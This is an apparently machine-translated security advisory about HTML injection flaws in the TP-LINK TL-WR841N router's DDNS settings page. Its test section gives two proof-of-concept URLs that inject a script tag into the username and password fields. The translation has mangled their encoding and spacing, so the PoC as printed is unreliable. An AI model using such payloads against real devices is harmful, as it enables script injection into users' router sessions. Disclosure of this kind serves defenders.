Multiple HTML injection vulnerabilities in TP-LINK TL-WR841N Routers
Release date:
Updated on:
Affected Systems:
TP-LINK TL-WR841N 3.13.9 Build 120201 Rel.54965n
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56602
TP-LINK TL-WR841N is a wireless router.
TP-LINK TL-WR841N 3.13.9 Build 120201 Rel.54965n and other versions have multiple HTML injection vulnerabilities that attackers can exploit to execute arbitrary script code in the user browser of the affected site.
<* Source: Matan Azugi
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Http://www.example.com/userRpm/NoipDdnsRpm.htm?
Provider = 3 & amp; username = a1234 & amp; lt;/script & amp; gt; & amp; lt; script & amp; gt; alert (1)
& Amp; lt;/script & amp; gt; 12aaa34f5be & amp; pwd = password & amp; cliUrl = & amp; Save = Save
Http://www.example.com/userRpm/NoipDdnsRpm.htm?
Provider = 3 & amp; username = 1234 & amp; pwd = a1234 & amp; lt;/script & amp; gt; & amp; lt; script & amp; gt; alert (1)
& Amp; lt;/script & amp; gt; 12aaa34f5be & amp; cliUrl = & amp; Save = Save
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
TP-LINK
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.tp-link.com/products/